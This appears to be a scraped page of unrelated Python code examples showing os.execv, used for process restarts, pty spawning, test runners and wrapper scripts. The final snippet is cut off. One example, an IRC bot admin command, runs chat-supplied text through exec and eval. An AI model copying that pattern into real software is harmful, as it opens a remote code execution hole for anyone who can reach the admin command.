import numpy as np
import overpy
from collections import defaultdict

from common.params import Params
Example #38
def main(argv):
    pm = get_package_manager()
    pm_conf = pm.config

    # initialize config with defaults
    c = CLIConfig(pm_conf)

    # parse opts to get the config file
    (opts, args) = parse_options(argv)
    c.apply_optparse(opts)

    # do the config file parsing
    c.parse_configfiles()

    # and now reapply the options to override config file defaults
    c.apply_optparse(opts)
    opts = c.get_options()

    if not opts.pretend:
        try:
            import psutil

            def getproc(pid):
                for ps in psutil.get_process_list():
                    if pid == ps.pid:
                        return ps
                raise Exception()

            def getscriptname(ps):
                if os.path.basename(ps.cmdline[0]) != ps.name:
                    return ps.cmdline[0]
                cmdline = ps.cmdline[1:]
                while cmdline[0].startswith('-'):  # omit options
                    cmdline.pop(0)
                return os.path.basename(cmdline[0])

            ps = getproc(os.getppid())
            # traverse upstream to find the emerge process
            while ps.pid > 1:
                if getscriptname(ps) == 'emerge':
                    out.s1(
                        'Running under the emerge process, assuming --pretend.'
                    )
                    opts.pretend = True
                    break
                ps = ps.parent
        except Exception:
            pass

    if os.geteuid() != 0 and opts.unprivileged_user:
        if not opts.pretend:
            out.s1('Running as an unprivileged user, assuming --pretend.')
            opts.pretend = True
        if opts.quickpkg:
            out.err(
                "Running as an unprivileged user, --quickpkg probably won't work"
            )

    try:
        packages = SmartLiveRebuild(opts, pm, cliargs=args)
    except SLRFailure:
        return 1

    if not packages and not any(filter(lambda a: not a.startswith('-'), args)):
        return 0

    if opts.pretend:
        for p in packages:
            print(p)
        return 0
    else:
        cmd = ['emerge', '--oneshot']
        cmd.extend(args)
        cmd.extend(packages)
        out.s2(' '.join(cmd))
        os.execv('/usr/bin/emerge', cmd)
        return 126
Example #39
def admin(req, arg):
	"""
	admin"""
	if len(arg):
		command = arg[0]
		arg = arg[1:]
		if command == "reload":
			for mod in arg:
				reload(sys.modules[mod])
			req.reply("Reloaded")
		elif command == "exec" and Config.config.get("enable_exec", None):
			try:
				exec(" ".join(arg).replace("$", "\n"))
			except Exception as e:
				type, value, tb = sys.exc_info()
				Logger.log("ce", "ERROR in " + req.instance + " : " + req.text)
				Logger.log("ce", repr(e))
				Logger.log("ce", "".join(traceback.format_tb(tb)))
				req.reply(repr(e))
				req.reply("".join(traceback.format_tb(tb)).replace("\n", " || "))
				del tb
		elif command == "ignore":
			Irc.ignore(arg[0], int(arg[1]))
			req.reply("Ignored")
		elif command == "die":
			for instance in Global.instances:
				Global.manager_queue.put(("Disconnect", instance))
			Global.manager_queue.join()
			Blocknotify.stop()
			Global.manager_queue.put(("Die",))
		elif command == "restart":
			for instance in Global.instances:
				Global.manager_queue.put(("Disconnect", instance))
			Global.manager_queue.join()
			Blocknotify.stop()
			os.execv(sys.executable, [sys.executable] + sys.argv)
		elif command == "manager":
			for cmd in arg:
				Global.manager_queue.put(cmd.split("$"))
			req.reply("Sent")
		elif command == "raw":
			Irc.instance_send(req.instance, eval(" ".join(arg)))
		elif command == "config":
			if arg[0] == "save":
				os.rename("Config.py", "Config.py.bak")
				with open("Config.py", "w") as f:
					f.write("config = " + pprint.pformat(Config.config) + "\n")
				req.reply("Done")
			elif arg[0] == "del":
				exec("del Config.config " + " ".join(arg[1:]))
				req.reply("Done")
			else:
				try:
					req.reply(repr(eval("Config.config " + " ".join(arg))))
				except SyntaxError:
					exec("Config.config " + " ".join(arg))
					req.reply("Done")
		elif command == "join":
			Irc.instance_send(req.instance, ("JOIN", arg[0]), priority = 0.1)
		elif command == "part":
			Irc.instance_send(req.instance, ("PART", arg[0]), priority = 0.1)
		elif command == "caches":
			acsize = 0
			accached = 0
			with Global.account_lock:
				for channel in Global.account_cache:
					for user in Global.account_cache[channel]:
						acsize += 1
						if Global.account_cache[channel][user] != None:
							accached += 1
			acchannels = len(Global.account_cache)
			whois = " OK"
			whoisok = True
			for instance in Global.instances:
				tasks = Global.instances[instance].whois_queue.unfinished_tasks
				if tasks:
					if whoisok:
						whois = ""
						whoisok = False
					whois += " %s:%d!" % (instance, tasks)
			req.reply("Account caches: %d user-channels (%d cached) in %d channels; Whois queues:%s" % (acsize, accached, acchannels, whois))
		elif command == "channels":
			inss = ""
			for instance in Global.instances:
				chans = []
				with Global.account_lock:
					for channel in Global.account_cache:
						if instance in Global.account_cache[channel]:
							chans.append(channel)
				inss += " %s:%s" % (instance, ",".join(chans))
			req.reply("Instances:" + inss)
		elif command == "balances":
			database, BitBeand = Transactions.balances()
			req.reply("BitBeand: %.8f; Database: %.8f" % (BitBeand, database))
		elif command == "blocks":
			info, hashd = Transactions.get_info()
			hashb = Transactions.lastblock.encode("ascii")
			req.reply("Best block: " + hashd + ", Last tx block: " + hashb + ", Blocks: " + str(info.blocks) + ", Testnet: " + str(info.testnet))
		elif command == "lock":
			if len(arg) > 1:
				if arg[1] == "on":
					Transactions.lock(arg[0], True)
				elif arg[1] == "off":
					Transactions.lock(arg[0], False)
				req.reply("Done")
			elif len(arg):
				req.reply("locked" if Transactions.lock(arg[0]) else "not locked")
		elif command == "ping":
			t = time.time()
			Irc.account_names(["."])
			pingtime = time.time() - t
			acc = Irc.account_names([req.nick])[0]
			t = time.time()
			Transactions.balance(acc)
			dbreadtime = time.time() - t
			t = time.time()
			Transactions.lock(acc, False)
			dbwritetime = time.time() - t
			t = time.time()
			Transactions.ping()
			rpctime = time.time() - t
			req.reply("Ping: %f, DB read: %f, DB write: %f, RPC: %f" % (pingtime, dbreadtime, dbwritetime, rpctime))
Example #40
def main(argv):
    parser = ArgumentParser(usage=__doc__.lstrip())
    parser.add_argument("--verbose",
                        "-v",
                        action="count",
                        default=1,
                        help="more verbosity")
    parser.add_argument(
        "--no-build",
        "-n",
        action="store_true",
        default=False,
        help="do not build the project (use system installed version)")
    parser.add_argument("--build-only",
                        "-b",
                        action="store_true",
                        default=False,
                        help="just build, do not run any tests")
    parser.add_argument("--doctests",
                        action="store_true",
                        default=False,
                        help="Run doctests in module")
    parser.add_argument("--refguide-check",
                        action="store_true",
                        default=False,
                        help="Run refguide check (do not run regular tests.)")
    parser.add_argument("--coverage",
                        action="store_true",
                        default=False,
                        help=("report coverage of project code. HTML output"
                              " goes under build/coverage"))
    parser.add_argument("--gcov",
                        action="store_true",
                        default=False,
                        help=("enable C code coverage via gcov (requires GCC)."
                              " gcov output goes to build/**/*.gc*"))
    parser.add_argument("--lcov-html",
                        action="store_true",
                        default=False,
                        help=("produce HTML for C code coverage information "
                              "from a previous run with --gcov. "
                              "HTML output goes to build/lcov/"))
    parser.add_argument("--mode",
                        "-m",
                        default="fast",
                        help="'fast', 'full', or something that could be "
                        "passed to nosetests -A [default: fast]")
    parser.add_argument("--submodule",
                        "-s",
                        default=None,
                        help="Submodule whose tests to run (cluster,"
                        " constants, ...)")
    parser.add_argument("--pythonpath",
                        "-p",
                        default=None,
                        help="Paths to prepend to PYTHONPATH")
    parser.add_argument("--tests",
                        "-t",
                        action='append',
                        help="Specify tests to run")
    parser.add_argument("--python",
                        action="store_true",
                        help="Start a Python shell with PYTHONPATH set")
    parser.add_argument("--ipython",
                        "-i",
                        action="store_true",
                        help="Start IPython shell with PYTHONPATH set")
    parser.add_argument("--shell",
                        action="store_true",
                        help="Start Unix shell with PYTHONPATH set")
    parser.add_argument("--debug",
                        "-g",
                        action="store_true",
                        help="Debug build")
    parser.add_argument("--parallel",
                        "-j",
                        type=int,
                        default=1,
                        help="Number of parallel jobs during build (requires "
                        "NumPy 1.10 or greater).")
    parser.add_argument("--show-build-log",
                        action="store_true",
                        help="Show build output rather than using a log file")
    parser.add_argument("--bench",
                        action="store_true",
                        help="Run benchmark suite instead of test suite")
    parser.add_argument("--bench-compare",
                        action="append",
                        metavar="BEFORE",
                        help=("Compare benchmark results of current HEAD to"
                              " BEFORE. Use an additional "
                              "--bench-compare=COMMIT to override HEAD with"
                              " COMMIT. Note that you need to commit your "
                              "changes first!"))
    parser.add_argument("args",
                        metavar="ARGS",
                        default=[],
                        nargs=REMAINDER,
                        help="Arguments to pass to Nose, Python or shell")
    parser.add_argument("--pep8",
                        action="store_true",
                        default=False,
                        help="Perform pep8 check with pycodestyle.")
    args = parser.parse_args(argv)

    if args.pep8:
        # os.system("flake8 scipy --ignore=F403,F841,F401,F811,F405,E121,E122,"
        #           "E123,E125,E126,E127,E128,E226,E231,E251,E265,E266,E302,"
        #           "E402,E501,E712,E721,E731,E741,W291,W293,W391,W503,W504"
        #           "--exclude=scipy/_lib/six.py")
        os.system("pycodestyle scipy benchmarks/benchmarks")
        sys.exit(0)

    if args.bench_compare:
        args.bench = True
        args.no_build = True  # ASV does the building

    if args.lcov_html:
        # generate C code coverage output
        lcov_generate()
        sys.exit(0)

    if args.pythonpath:
        for p in reversed(args.pythonpath.split(os.pathsep)):
            sys.path.insert(0, p)

    if args.gcov:
        gcov_reset_counters()

    if args.debug and args.bench:
        print("*** Benchmarks should not be run against debug version; "
              "remove -g flag ***")

    if not args.no_build:
        site_dir = build_project(args)
        sys.path.insert(0, site_dir)
        os.environ['PYTHONPATH'] = site_dir

    extra_argv = args.args[:]
    if extra_argv and extra_argv[0] == '--':
        extra_argv = extra_argv[1:]

    if args.python:
        if extra_argv:
            # Don't use subprocess, since we don't want to include the
            # current path in PYTHONPATH.
            sys.argv = extra_argv
            with open(extra_argv[0], 'r') as f:
                script = f.read()
            sys.modules['__main__'] = new_module('__main__')
            ns = dict(__name__='__main__', __file__=extra_argv[0])
            exec_(script, ns)
            sys.exit(0)
        else:
            import code
            code.interact()
            sys.exit(0)

    if args.ipython:
        import IPython
        IPython.embed(user_ns={})
        sys.exit(0)

    if args.shell:
        shell = os.environ.get('SHELL', 'sh')
        print("Spawning a Unix shell...")
        os.execv(shell, [shell] + extra_argv)
        sys.exit(1)

    if args.coverage:
        dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
        fn = os.path.join(dst_dir, 'coverage_html.js')
        if os.path.isdir(dst_dir) and os.path.isfile(fn):
            shutil.rmtree(dst_dir)
        extra_argv += ['--cov-report=html:' + dst_dir]

    if args.refguide_check:
        cmd = [
            os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'), '--doctests'
        ]
        if args.submodule:
            cmd += [args.submodule]
        os.execv(sys.executable, [sys.executable] + cmd)
        sys.exit(0)

    if args.bench:
        # Run ASV
        items = extra_argv
        if args.tests:
            items += args.tests
        if args.submodule:
            items += [args.submodule]

        bench_args = []
        for a in items:
            bench_args.extend(['--bench', a])

        if not args.bench_compare:
            cmd = [
                os.path.join(ROOT_DIR, 'benchmarks', 'run.py'), 'run', '-n',
                '-e', '--python=same'
            ] + bench_args
            os.execv(sys.executable, [sys.executable] + cmd)
            sys.exit(1)
        else:
            if len(args.bench_compare) == 1:
                commit_a = args.bench_compare[0]
                commit_b = 'HEAD'
            elif len(args.bench_compare) == 2:
                commit_a, commit_b = args.bench_compare
            else:
                parser.error("Too many commits to compare benchmarks for")

            # Check for uncommitted files
            if commit_b == 'HEAD':
                r1 = subprocess.call(
                    ['git', 'diff-index', '--quiet', '--cached', 'HEAD'])
                r2 = subprocess.call(['git', 'diff-files', '--quiet'])
                if r1 != 0 or r2 != 0:
                    print("*" * 80)
                    print("WARNING: you have uncommitted changes --- "
                          "these will NOT be benchmarked!")
                    print("*" * 80)

            # Fix commit ids (HEAD is local to current repo)
            p = subprocess.Popen(['git', 'rev-parse', commit_b],
                                 stdout=subprocess.PIPE)
            out, err = p.communicate()
            commit_b = out.strip()

            p = subprocess.Popen(['git', 'rev-parse', commit_a],
                                 stdout=subprocess.PIPE)
            out, err = p.communicate()
            commit_a = out.strip()

            cmd = [
                os.path.join(ROOT_DIR, 'benchmarks', 'run.py'), 'continuous',
                '-e', '-f', '1.05', commit_a, commit_b
            ] + bench_args
            os.execv(sys.executable, [sys.executable] + cmd)
            sys.exit(1)

    if args.build_only:
        sys.exit(0)
    else:
        __import__(PROJECT_MODULE)
        test = sys.modules[PROJECT_MODULE].test

    if args.submodule:
        tests = [PROJECT_MODULE + "." + args.submodule]
    elif args.tests:
        tests = args.tests
    else:
        tests = None

    # Run the tests

    if not args.no_build:
        test_dir = site_dir
    else:
        test_dir = os.path.join(ROOT_DIR, 'build', 'test')
        if not os.path.isdir(test_dir):
            os.makedirs(test_dir)

    shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
                    os.path.join(test_dir, '.coveragerc'))

    cwd = os.getcwd()
    try:
        os.chdir(test_dir)
        result = test(args.mode,
                      verbose=args.verbose,
                      extra_argv=extra_argv,
                      doctests=args.doctests,
                      coverage=args.coverage,
                      tests=tests,
                      parallel=args.parallel)
    finally:
        os.chdir(cwd)

    if isinstance(result, bool):
        sys.exit(0 if result else 1)
    elif result.wasSuccessful():
        sys.exit(0)
    else:
        sys.exit(1)
Example #41
#!/usr/bin/env python3
import os

assert os.system("make") == 0
os.environ['LD_LIBRARY_PATH'] = "/system/lib64:" + os.environ['LD_LIBRARY_PATH']
os.execv("./sensord", ["sensord"])
Example #42
def restart():
    import __main__
    os.execv(__main__.__file__, sys.argv)
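
Note that this only works when __main__.__file__ is directly executable (shebang plus exec bit). A sketch of a more portable variant that re-runs the script through the current interpreter, in the same spirit as several other examples here:

def restart_via_interpreter():
    import os, sys, __main__
    os.execv(sys.executable, [sys.executable, __main__.__file__] + sys.argv[1:])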
Example #43
def Main(args):
    try:
        mailpile.platforms.DetectBinaries(_raise=OSError)
    except OSError as e:
        binary = str(e).split()[0]
        sys.stderr.write("""
Required binary missing or unusable: %s

If you know where it is, or would like to skip this test and run Mailpile
anyway, you can set one of the following environment variables:

    MAILPILE_%s="/path/to/binary"
or
    MAILPILE_IGNORE_BINARIES="%s"  # Can be a space-separated list

Note that skipping a binary check may cause the app to become unstable or
fail in unexpected ways. If it breaks you get to keep both pieces!

""" % (e, binary.upper(), binary))
        sys.exit(1)

    # Enable our connection broker, try to prevent badly behaved plugins from
    # bypassing it.
    DisableUnbrokeredConnections()

    # Bootstrap translations until we've loaded everything else
    mailpile.i18n.ActivateTranslation(None, ConfigManager, None)
    try:
        # Create our global config manager and the default (CLI) session
        config = ConfigManager(rules=mailpile.config.defaults.CONFIG_RULES)
        session = Session(config)
        cli_ui = session.ui = UserInteraction(config)
        session.main = True
        try:
            CatchUnixSignals(session)
            config.clean_tempfile_dir()
            config.load(session)
        except IOError:
            if config.sys.debug:
                session.ui.error(
                    _('Failed to decrypt configuration, '
                      'please log in!'))
        HealthCheck(session, None, []).run()
        config.prepare_workers(session)
    except AccessError as e:
        session.ui.error('Access denied: %s\n' % e)
        sys.exit(1)

    try:
        try:
            if '--login' in args:
                a1 = args[:args.index('--login') + 1]
                a2 = args[len(a1):]
            else:
                a1, a2 = args, []

            allopts = []
            for argset in (a1, a2):
                shorta, longa = '', []
                for cls in COMMANDS:
                    shortn, longn, urlpath, arglist = cls.SYNOPSIS[:4]
                    if arglist:
                        if shortn:
                            shortn += ':'
                        if longn:
                            longn += '='
                    if shortn:
                        shorta += shortn
                    if longn:
                        longa.append(longn.replace(' ', '_'))

                opts, args = getopt.getopt(argset, shorta, longa)
                allopts.extend(opts)
                for opt, arg in opts:
                    session.ui.display_result(
                        Action(session, opt.replace('-', ''),
                               arg.decode('utf-8')))
                if args:
                    session.ui.display_result(
                        Action(session, args[0],
                               ' '.join(args[1:]).decode('utf-8')))

        except (getopt.GetoptError, UsageError) as e:
            session.fatal_error(unicode(e))

        if (not allopts) and (not a1) and (not a2):
            InteractCommand(session).run()

    except KeyboardInterrupt:
        pass

    except:
        traceback.print_exc()

    finally:
        write_readline_history(session)

        # Make everything in the background quit ASAP...
        mailpile.util.LAST_USER_ACTIVITY = 0
        mailpile.util.QUITTING = mailpile.util.QUITTING or True

        if config.plugins:
            config.plugins.process_shutdown_hooks()

        config.stop_workers()
        if config.index:
            config.index.save_changes()
        if config.event_log:
            config.event_log.close()

        session.ui.display_result(Action(session, 'cleanup', ''))

        if session.interactive and config.sys.debug:
            session.ui.display_result(Action(session, 'ps', ''))

        # Remove anything that we couldn't remove before
        safe_remove()

        # Restart the app if that's what was requested
        if mailpile.util.QUITTING == 'restart':
            os.execv(sys.argv[0], sys.argv)
Example #44
def main():
    op = optparse.OptionParser()
    op.add_option('--port', dest='port', type='int', default=9988)
    op.add_option('--threads', dest='threads', type='int', default=2)
    op.add_option('--flagfile', dest='flagfile', default=None)
    op.add_option('--log', dest='logname', default=None)
    (options, args) = op.parse_args()

    if options.flagfile:
        (options, args) = read_flagfile(op, open(options.flagfile, 'r'),
                                        options, args)
    elif os.path.exists('flagfile'):
        (options, args) = read_flagfile(op, open('flagfile', 'r'), options,
                                        args)
    rootdir = os.path.dirname(os.path.abspath(__file__))
    bindir = os.path.join(rootdir, 'bin')
    datadir = os.path.join(rootdir, 'data')
    workdir = os.path.join(rootdir, 'work')

    if not os.path.isdir(datadir):
        os.mkdir(datadir)
    if not os.path.isdir(workdir):
        os.mkdir(workdir)

    runallstates = os.path.join(bindir, 'runallstates.py')

    cmd = [
        runallstates, '--bestlog=bestlog', '--runlog=runlog', '--d2',
        '--fr=4/9', '--server=http://bots.bdistricting.net/rd_datasets/',
        '--port=%d' % (options.port, ),
        '--threads=%d' %
        (options.threads, ), '--datadir=' + datadir, '--bindir=' + bindir
    ] + args

    proc = subprocess.Popen(cmd,
                            cwd=workdir,
                            shell=False,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)

    print('status should be available on')
    print('http://localhost:%d/' % (options.port, ))

    log = None
    if options.logname:
        if options.logname == '-':
            logpath = None
            log = sys.stdout
        else:
            logpath = options.logname
    else:
        logpath = os.path.join(workdir, 'dblog_')
    if log is None:
        log = RotatingLogWriter(logpath)
    log.write('# cmd: "%s"\n' % ('" "'.join(cmd), ))
    piped_run(proc, log)
    log.close()

    reloadmarker = os.path.join(workdir, 'reload')
    if os.path.exists(reloadmarker):
        os.unlink(reloadmarker)
        os.execv(__file__, sys.argv)
Exemple #45
0
def launchWithName(name):
    if name and name != sys.argv[0]:
        exe = os.path.realpath(sys.executable)
        log.msg('Changing process name to ' + name)
        os.execv(exe, [name, sys.argv[0], '--originalname'] + sys.argv[1:])
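# A hedged aside, not part of the snippet above: launchWithName works because the
# first element of the argv list passed to os.execv becomes the visible argv[0]
# of the new process (what ps displays), independent of the file actually executed.
# Minimal sketch, assuming /bin/sleep exists:
import os

pid = os.fork()
if pid == 0:
    # runs /bin/sleep, but process listings show it as "my-sleeper 30"
    os.execv("/bin/sleep", ["my-sleeper", "30"])
os.waitpid(pid, 0)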
Exemple #46
0
    def spawn(cls,
              argv,
              cwd=None,
              env=None,
              echo=True,
              preexec_fn=None,
              dimensions=(24, 80)):
        '''Start the given command in a child process in a pseudo terminal.

        This does all the fork/exec type of stuff for a pty, and returns an
        instance of PtyProcess.

        If preexec_fn is supplied, it will be called with no arguments in the
        child process before exec-ing the specified command.
        It may, for instance, set signal handlers to SIG_DFL or SIG_IGN.

        Dimensions of the pseudoterminal used for the subprocess can be
        specified as a tuple (rows, cols), or the default (24, 80) will be used.
        '''
        # Note that it is difficult for this method to fail.
        # You cannot detect if the child process cannot start.
        # So the only way you can tell if the child process started
        # or not is to try to read from the file descriptor. If you get
        # EOF immediately then it means that the child is already dead.
        # That may not necessarily be bad because you may have spawned a child
        # that performs some task; creates no stdout output; and then dies.

        if not isinstance(argv, (list, tuple)):
            raise TypeError("Expected a list or tuple for argv, got %r" % argv)

        # Shallow copy of argv so we can modify it
        argv = argv[:]
        command = argv[0]

        command_with_path = which(command)
        if command_with_path is None:
            raise FileNotFoundError('The command was not found or was not ' +
                                    'executable: %s.' % command)
        command = command_with_path
        argv[0] = command

        # [issue #119] To prevent the case where exec fails and the user is
        # stuck interacting with a python child process instead of whatever
        # was expected, we implement the solution from
        # http://stackoverflow.com/a/3703179 to pass the exception to the
        # parent process

        # [issue #119] 1. Before forking, open a pipe in the parent process.
        exec_err_pipe_read, exec_err_pipe_write = os.pipe()

        if use_native_pty_fork:
            pid, fd = pty.fork()
        else:
            # Use internal fork_pty, for Solaris
            pid, fd = _fork_pty.fork_pty()

        # Some platforms must call setwinsize() and setecho() from the
        # child process, and others from the master process. We do both,
        # allowing IOError for either.

        if pid == CHILD:
            # set window size
            try:
                _setwinsize(STDIN_FILENO, *dimensions)
            except IOError as err:
                if err.args[0] not in (errno.EINVAL, errno.ENOTTY):
                    raise

            # disable echo if spawn argument echo was unset
            if not echo:
                try:
                    _setecho(STDIN_FILENO, False)
                except (IOError, termios.error) as err:
                    if err.args[0] not in (errno.EINVAL, errno.ENOTTY):
                        raise

            # [issue #119] 3. The child closes the reading end and sets the
            # close-on-exec flag for the writing end.
            os.close(exec_err_pipe_read)
            fcntl.fcntl(exec_err_pipe_write, fcntl.F_SETFD, fcntl.FD_CLOEXEC)

            # Do not allow child to inherit open file descriptors from parent,
            # with the exception of the exec_err_pipe_write of the pipe
            # Impose ceiling on max_fd: AIX bugfix for users with unlimited
            # nofiles where resource.RLIMIT_NOFILE is 2^63-1 and os.closerange()
            # occasionally raises out of range error
            max_fd = min(1048576,
                         resource.getrlimit(resource.RLIMIT_NOFILE)[0])
            os.closerange(3, exec_err_pipe_write)
            os.closerange(exec_err_pipe_write + 1, max_fd)

            if cwd is not None:
                os.chdir(cwd)

            if preexec_fn is not None:
                try:
                    preexec_fn()
                except Exception as e:
                    ename = type(e).__name__
                    tosend = '{}:0:{}'.format(ename, str(e))
                    if PY3:
                        tosend = tosend.encode('utf-8')

                    os.write(exec_err_pipe_write, tosend)
                    os.close(exec_err_pipe_write)
                    os._exit(1)

            try:
                if env is None:
                    os.execv(command, argv)
                else:
                    os.execvpe(command, argv, env)
            except OSError as err:
                # [issue #119] 5. If exec fails, the child writes the error
                # code back to the parent using the pipe, then exits.
                tosend = 'OSError:{}:{}'.format(err.errno, str(err))
                if PY3:
                    tosend = tosend.encode('utf-8')
                os.write(exec_err_pipe_write, tosend)
                os.close(exec_err_pipe_write)
                os._exit(os.EX_OSERR)

        # Parent
        inst = cls(pid, fd)

        # Set some informational attributes
        inst.argv = argv
        if env is not None:
            inst.env = env
        if cwd is not None:
            inst.launch_dir = cwd

        # [issue #119] 2. After forking, the parent closes the writing end
        # of the pipe and reads from the reading end.
        os.close(exec_err_pipe_write)
        exec_err_data = os.read(exec_err_pipe_read, 4096)
        os.close(exec_err_pipe_read)

        # [issue #119] 6. The parent reads eof (a zero-length read) if the
        # child successfully performed exec, since close-on-exec made
        # successful exec close the writing end of the pipe. Or, if exec
        # failed, the parent reads the error code and can proceed
        # accordingly. Either way, the parent blocks until the child calls
        # exec.
        if len(exec_err_data) != 0:
            try:
                errclass, errno_s, errmsg = exec_err_data.split(b':', 2)
                exctype = getattr(builtins, errclass.decode('ascii'),
                                  Exception)

                exception = exctype(errmsg.decode('utf-8', 'replace'))
                if exctype is OSError:
                    exception.errno = int(errno_s)
            except:
                raise Exception('Subprocess failed, got bad error data: %r' %
                                exec_err_data)
            else:
                raise exception

        try:
            inst.setwinsize(*dimensions)
        except IOError as err:
            if err.args[0] not in (errno.EINVAL, errno.ENOTTY, errno.ENXIO):
                raise

        return inst
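# A standalone sketch (illustrative, not part of ptyprocess) of the exec-error
# pipe described in the [issue #119] comments above, using a plain os.fork()
# instead of a pty; run_with_exec_report is a hypothetical name.
import fcntl
import os

def run_with_exec_report(argv):
    read_fd, write_fd = os.pipe()
    pid = os.fork()
    if pid == 0:  # child
        os.close(read_fd)
        # close-on-exec: a successful exec closes write_fd, so the parent sees EOF
        fcntl.fcntl(write_fd, fcntl.F_SETFD, fcntl.FD_CLOEXEC)
        try:
            os.execv(argv[0], argv)
        except OSError as err:
            os.write(write_fd, str(err).encode('utf-8'))
            os.close(write_fd)
            os._exit(127)
    # parent: blocks until the child either execs (EOF) or reports a failure
    os.close(write_fd)
    data = os.read(read_fd, 4096)
    os.close(read_fd)
    if data:
        os.waitpid(pid, 0)
        raise OSError(data.decode('utf-8', 'replace'))
    return pid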
#!/usr/bin/python
# Point the external lookup to this script.
# Replace real_script with the name/location of your script
# This was found on Splunk forums.

import os, sys
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
    if envvar in os.environ:
        del os.environ[envvar]
python_executable = "/opt/splunk/bin/python"
real_script = "/opt/splunk/etc/apps/ThreatHunting/bin/vtLookup.py"
os.execv(python_executable, [ python_executable, real_script ] + sys.argv[1:])
Exemple #48
0
def main():
    # Bypass all of chromite_wrapper's attempted 'help' handling and exec the
    # actual cros_sdk wrapper/helper that chromite provides.
    location = os.path.dirname(os.path.abspath(__file__))
    location = os.path.join(location, 'cros_sdk')
    os.execv(location, [location] + sys.argv[1:])
Exemple #49
0
    try:
        import wiredtiger
    except:
        # If the .libs directory is not in our library search path,
        # we need to set it and retry.  However, the dynamic linker
        # has already cached its search path, so our only option is
        # to restart the Python interpreter.
        if '_workgen_init' not in os.environ:
            os.environ['_workgen_init'] = 'true'
            dotlibs = os.path.join(wt_builddir, '.libs')
            _prepend_env_path('LD_LIBRARY_PATH', dotlibs)
            _prepend_env_path('DYLD_LIBRARY_PATH', dotlibs)
            py_args = sys.argv
            py_args.insert(0, sys.executable)
            try:
                os.execv(sys.executable, py_args)
            except Exception as exception:
                print('re-exec failed: ' + str(exception), file=sys.stderr)
                print('  exec(' + sys.executable + ', ' + str(py_args) + ')')
                print('Try adding "' + dotlibs + '" to the', file=sys.stderr)
                print('LD_LIBRARY_PATH environment variable before running ' + \
                    'this program again.', file=sys.stderr)
                sys.exit(1)

try:
    import workgen
except:
    sys.path.insert(0, os.path.join(workgen_src, 'workgen'))
    sys.path.insert(0, os.path.join(wt_builddir, 'bench', 'workgen'))
    import workgen
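# _prepend_env_path is referenced above but not defined in this fragment; a
# plausible sketch (an assumption, not the workgen source) just puts the
# directory at the front of a PATH-style environment variable:
import os

def _prepend_env_path(name, value):
    current = os.environ.get(name)
    os.environ[name] = value if not current else value + os.pathsep + current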
def main():
	def print_results(action=None):
		printed=False
		results=store.get_result(action)
		status=store.get_status(action)
		if 'status' not in status:
			status['status']=1
			status['msg']='package not found'
		processed=[]
		print ("")
		for action in results.keys():
			if action in actions and not actionList[action]:
				if status['status']==0:
					print (_(u"Results for ")+_(action))
					for data in results[action]:
						if action=='info':
							try:
								print(color.DARKCYAN+_(u'Package')+': '+color.END + data['package'])
								print(_(u'Name')+': '+data['name'])
								print(_(u'ID')+': '+data['id'])
								print(_(u'Version')+': '+data['version'])
								print(_(u'Size')+': '+data['size'])
								print(_(u'License')+': '+data['license'])
								listCat=[]
								for cat in data['categories']:
									listCat.append(_(cat))
								print(_(u'Categories')+': '+','.join(listCat))
								msg=''
								if data['state']=='installed':
									msg=_('installed')
								else:
									msg=_('available')
								if data['updatable']:
									msg +=_(' (updatable)')
								print(_(u'Status')+': '+msg)
								print(_(u'Summary')+': '+data['summary'])
								desc=(html2text.html2text(data['description'],"lxml"))
								print(_(u'Description')+': '+desc)
								pkgString=[]
								for dependency in data['depends']:
										pkgName=dependency.split(';')[0]
										pkgString.append(pkgName)
								print(_(u'Depends')+': '+', '.join(pkgString))
								print("")
							except Exception as e:
								print("CLI: Error printing key %s"%e)
						elif action=='search':
							#Only print name and summary
							data_id=''
							printcolor=color.DARKCYAN
							if data['bundle']:
								printcolor=color.PURPLE
							elif (data['package'] not in data['id'] or data['package'] in processed):
								data_id=" (%s)"%data['id']
							else:
								processed.append(data['package'])
							print("%s%s%s%s: %s"%(printcolor,data['package'],data_id,color.END,data['summary']))

						elif action=='list':
							#Print package, summary and status
							try:
								if data['package']:
									package=data['package']
								else:
									package=data['name']
								if data['state']=='installed':
									msg=_('installed')
								else:
									msg=_('available')
								print(color.DARKCYAN+package+color.END+": "+data['summary']+' ('+','.join(data['categories'])+')'+' ('+msg+')')
							except Exception as e:
								print(_(u'Error listing')+ ':'+str(e))
								pass
						elif action=='install':
								print(color.DARKCYAN+data['package']+color.END+" "+ _(u"installed")+" "+color.BOLD+ _(u"succesfully")+color.END)
						elif action=='remove':
								print(color.DARKCYAN+data['package']+color.END+" "+ _(u"removed")+" "+color.BOLD+ _(u"succesfully")+color.END)
						else:
							print("RESULT:\n%s"%data)
				else:
					msg=_(u"Unable to")+' '+_(action)
					failed=parms[action]
					if (action=='search' or action=='info'):
							msg=_(u"Unable to show")
					if action=='list':
							failed=', '.join(failed)

					print (color.RED+_(u"Error")+": "+color.END+msg+' '+failed+' ('+_(status['msg'])+')')
				printed=True
		return(printed)
	#def print_results

	CURSOR_UP='\033[F'
	ERASE_LINE='\033[K'
	actions=[]
	parms={}
	dbg=False
	appimage=False
	snap=False
	flatpak=False
	autostart=True
	args=process_Args(sys.argv)
#	if args.debug:
#		dbg=True
	if args.appimage:
		appimage=True
	if args.flatpak:
		flatpak=True
	if args.snap:
		snap=True
	if args.update:
		actions.append('cache')
		parms['cache']=None
		autostart=False
	if args.view:
		actions.append('info')
		parms['info']=args.view
	if args.search:
		actions.append('search')
		parms['search']=args.search
	if args.install:
		actions.append('install')
		parms['install']=args.install
	if args.remove:
		actions.append('remove')
		parms['remove']=args.remove
#	if args.random:
#		actions.append('random')
#		parms['random']=args.random
#	if args.list:
#		actions.append('list')
#		parms['list']=args.list

	actionList={'search':False,'info':False,'pkgInfo':False,'install':False,'remove':False,'list':False,'list-sections':False,'random':False,'cache':False}
	#Replace with rebost
	for action in actions:
		parm=str(parms[action])
		if action in ["view","v","info"]:
			action="show"
		os.execv("/usr/bin/rebost",["/usr/bin/rebost",action,parm])
	start_time=time.time()
	store=storeManager.StoreManager(flatpak=flatpak,appimage=appimage,snap=snap,dbg=dbg,autostart=autostart,cli=True)
	for action in actions:
		th=threading.Thread(target=store.execute_action, args = (action,parms[action]))
		th.start()
		actionList[action]=False
		
	inc=0
	banner=' '.join(actions)
	banner='LliureX Store'
	numchar=len(banner)
